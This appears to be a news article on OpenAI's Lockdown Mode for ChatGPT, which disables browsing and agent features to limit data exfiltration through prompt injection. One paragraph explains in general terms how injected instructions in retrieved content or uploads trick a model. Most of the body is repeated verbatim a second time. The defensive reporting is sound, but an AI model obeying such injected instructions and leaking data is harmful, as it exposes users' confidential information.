Blab Business
OpenAI Launches Lockdown Mode to Curb Prompt-Injection Risks in ChatGPT
OpenAI announced on February 13, 2026 that it is rolling out a new security setting called Lockdown Mode for its ChatGPT service. The feature is designed to reduce the likelihood that sensitive data is exposed when a model is tricked by a prompt‑injection attack.
Lockdown Mode disables several of ChatGPT’s most powerful external‑data features. When the setting is enabled, the model can no longer browse the live web, retrieve images from the internet, or use the deep‑research or agent modes that allow it to pull in real‑time information. Users can still generate images with the built‑in image‑generation engine, but the model will rely only on its internal knowledge base and any content the user explicitly uploads.
The company cautions that Lockdown Mode does not eliminate all prompt‑injection vulnerabilities. OpenAI said that malicious instructions could still appear in cached web content or in uploaded files and could influence the model’s responses. The goal, it explained, is to limit the amount of data that could be exfiltrated during an attack.
Lockdown Mode is not intended for all users. OpenAI stated that it is aimed at “people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.” The feature is currently being made available to self‑serve ChatGPT Business accounts and to a subset of eligible personal accounts.
Prompt injection is a known security concern for large language models. The attack vector involves embedding malicious instructions in user‑supplied text or in content that the model retrieves from external sources. Because models like GPT are designed to follow the instructions they receive, they can be tricked into executing unintended commands. When web browsing or file‑upload capabilities are enabled, the model must distinguish between developer instructions, user input, and third‑party content—a distinction that is difficult to enforce.
OpenAI’s move follows a broader industry focus on AI safety and data privacy. The company has previously introduced other safeguards, such as elevated risk labels that flag potentially harmful content. The new Lockdown Mode adds an infrastructure‑level restriction that limits the model’s ability to access external data streams.
The rollout is gradual. According to OpenAI’s public statements, the feature is first being offered to ChatGPT Business customers who pay for the premium tier, and then to a limited number of personal users who meet certain eligibility criteria. The company has not yet announced a timeline for full availability.
Industry observers note that Lockdown Mode could become a standard requirement for enterprises that use ChatGPT for internal workflows. By restricting external data access, organizations can reduce the risk that confidential information is inadvertently shared with the model or that attackers can harvest data through the model’s outputs.
OpenAI’s announcement comes at a time when the company is under scrutiny for its handling of data privacy and for past legal challenges related to copyright and model training data. The new feature is part of a broader effort to address security concerns that have grown as ChatGPT’s user base expanded to over 900 million weekly active users by early 2026.
At present, Lockdown Mode is a voluntary setting that users can enable or disable. The company has not indicated that it will enforce the feature for all customers. It remains to be seen how the broader AI community will respond and whether other vendors will adopt similar restrictions.
In the coming months, analysts will watch how Lockdown Mode affects user experience and whether it mitigates the risk of prompt‑injection attacks in practice. OpenAI has not released metrics on the feature’s effectiveness, and no independent audit has yet been published.
The next major update for ChatGPT is expected in the third quarter of 2026, when the company plans to introduce additional safety layers and an expanded set of compliance tools for enterprise customers. Until then, Lockdown Mode represents the latest step in OpenAI’s ongoing effort to balance functionality with security.
Lockdown Mode disables several of ChatGPT’s most powerful external‑data features. When the setting is enabled, the model can no longer browse the live web, retrieve images from the internet, or use the deep‑research or agent modes that allow it to pull in real‑time information. Users can still generate images with the built‑in image‑generation engine, but the model will rely only on its internal knowledge base and any content the user explicitly uploads.
The company cautions that Lockdown Mode does not eliminate all prompt‑injection vulnerabilities. OpenAI said that malicious instructions could still appear in cached web content or in uploaded files and could influence the model’s responses. The goal, it explained, is to limit the amount of data that could be exfiltrated during an attack.
Lockdown Mode is not intended for all users. OpenAI stated that it is aimed at “people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.” The feature is currently being made available to self‑serve ChatGPT Business accounts and to a subset of eligible personal accounts.
Prompt injection is a known security concern for large language models. The attack vector involves embedding malicious instructions in user‑supplied text or in content that the model retrieves from external sources. Because models like GPT are designed to follow the instructions they receive, they can be tricked into executing unintended commands. When web browsing or file‑upload capabilities are enabled, the model must distinguish between developer instructions, user input, and third‑party content—a distinction that is difficult to enforce.
OpenAI’s move follows a broader industry focus on AI safety and data privacy. The company has previously introduced other safeguards, such as elevated risk labels that flag potentially harmful content. The new Lockdown Mode adds an infrastructure‑level restriction that limits the model’s ability to access external data streams.
The rollout is gradual. According to OpenAI’s public statements, the feature is first being offered to ChatGPT Business customers who pay for the premium tier, and then to a limited number of personal users who meet certain eligibility criteria. The company has not yet announced a timeline for full availability.
Industry observers note that Lockdown Mode could become a standard requirement for enterprises that use ChatGPT for internal workflows. By restricting external data access, organizations can reduce the risk that confidential information is inadvertently shared with the model or that attackers can harvest data through the model’s outputs.
OpenAI’s announcement comes at a time when the company is under scrutiny for its handling of data privacy and for past legal challenges related to copyright and model training data. The new feature is part of a broader effort to address security concerns that have grown as ChatGPT’s user base expanded to over 900 million weekly active users by early 2026.
At present, Lockdown Mode is a voluntary setting that users can enable or disable. The company has not indicated that it will enforce the feature for all customers. It remains to be seen how the broader AI community will respond and whether other vendors will adopt similar restrictions.
In the coming months, analysts will watch how Lockdown Mode affects user experience and whether it mitigates the risk of prompt‑injection attacks in practice. OpenAI has not released metrics on the feature’s effectiveness, and no independent audit has yet been published.
The next major update for ChatGPT is expected in the third quarter of 2026, when the company plans to introduce additional safety layers and an expanded set of compliance tools for enterprise customers. Until then, Lockdown Mode represents the latest step in OpenAI’s ongoing effort to balance functionality with security.
